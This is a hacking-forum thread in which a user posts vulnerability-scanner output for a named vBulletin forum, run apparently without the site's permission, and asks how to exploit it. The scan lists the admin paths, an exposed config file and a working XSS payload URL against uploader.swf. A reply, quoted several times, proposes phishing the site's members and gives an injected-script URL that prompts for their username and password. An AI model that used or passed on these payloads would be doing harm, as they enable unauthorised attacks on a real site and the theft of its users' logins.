Help with XSS

OP11-14-2017 - 06:09 PM

Hello, so I am trying to learn how to XSS and I scanned a site with vbscan on kali and turns out the forum is xss, here is the scan results..

Code:
[+] Detecting Vbulletin based Firewall

[++] No known firewall detected

[+] Detecting vBulletin Version

[++] vBulletin 4.2.5

[+] Core Vbulletin Vulnerability

[++] Target vbulletin core is not vulnerable

[+] Checking apache info/status files

[++] Readable info/status files are not found

[+] Checking admincp/modcp path

[++] admincp Found

https://deathwishx.com/forumv2//admincp

[++] modcp Found

https://deathwishx.com/forumv2//modcp

[+] Checking validator.php

[++] validator.php is not found

[+] Checking robots.txt existing

[++] robots.txt is not found

[+] Checking c99 xml shell in admincp/subscriptions.php

[++] c99 xml shell is Not Found

[+] Finding common backup files name

[++] Backup files are not found

[+] Finding common log files name

[++] error log is not found

[+] Checking config.php.x for disclure config file

[++] Readable config file is found 

config file path : https://deathwishx.com/forumv2//includes/config.php.new

[+] Checking faq.php RCE backdoor

[++] Remote Code Execute backdoor not found

[+] Checking vBSEO 3.x - LFI (Local File Inclusion) vulnerability

[++] vbseo.php LFI is not vulnerable

[+] Checking vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability

[++] xperience.php not vulnerable

[+] Checking arcade.php SQLI Vulnerability

[++] arcade.php not found

[+] Checking vBulletin YUI 2.9.0 XSS

[++] uploader.swf is vulnerable 

https://deathwishx.com/forumv2//clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(/XSS/);}//

POC : https://packetstormsecurity.com/files/124746/vBulletin-YUI-2.9.0-Cross-Site-Scripting.html

[+] Checking for html tags status

[++] HTML tag are Disable

[+] Checking Vbulletin 5.x - Remote Code Execution Exploit

[++] decodeArguments is not vulnerable

Was hoping someone could help me in learning what to do to exploit this.

Thanks.

12-24-2017 - 05:12 AM

were you scanning this forum?

OP12-25-2017 - 02:42 AM

(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

12-25-2017 - 09:41 PM

(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>

OP12-27-2017 - 10:41 PM

(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>

ah thank you for your help.

12-27-2017 - 11:25 PM

(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>

Did you copy/paste this from somewhere? Lol.... unless you changed text format etc Cheese

OP12-28-2017 - 02:14 AM

(12-27-2017 - 11:25 PM)CaptainModz Wrote:
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
Did you copy/paste this from somewhere? Lol.... unless you changed text format etc

I was wondering that myself. haha

12-28-2017 - 02:19 AM

(12-28-2017 - 02:14 AM)Gonz0 Wrote:
(12-27-2017 - 11:25 PM)CaptainModz Wrote:
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
Did you copy/paste this from somewhere? Lol.... unless you changed text format etc

I was wondering that myself. haha

Aye.. where the hell is my christmas tree award?? Upside_down

OP12-28-2017 - 02:20 AM

(12-28-2017 - 02:19 AM)CaptainModz Wrote:
(12-28-2017 - 02:14 AM)Gonz0 Wrote:
(12-27-2017 - 11:25 PM)CaptainModz Wrote:
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote: if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
Did you copy/paste this from somewhere? Lol.... unless you changed text format etc

I was wondering that myself. haha

Aye.. where the hell is my christmas tree award??

thats a good question Wink

12-29-2017 - 09:06 PM

(12-27-2017 - 11:25 PM)CaptainModz Wrote:
(12-25-2017 - 09:41 PM)beta Wrote:
(12-25-2017 - 02:42 AM)Gonz0 Wrote:
(12-24-2017 - 05:12 AM)beta Wrote: were you scanning this forum?

if you read the scan results. it says deathwish.. not demon forums.

If you look at the scan result, you can see that there is a vulnerable link:
https://deathwishx.com/forumv2//clientsc...owedDomain=\"})))}catch(e){alert(/XSS/);}//
One simple thing you can do to exploit this XSS vuln is phish on the site... For example:
deathwishx.com/forum2//clientscript/yui/uploader/assets/uploader.swf?<script>prompt('Username', ' '); prompt('Password', ' ')</script>
Did you copy/paste this from somewhere? Lol.... unless you changed text format etc

No what makes you think that? Phishing with XSS is like the simplest thing you can do other than making a pop-up...

Help with XSS

About Us

Navigation

Extras

Help

Account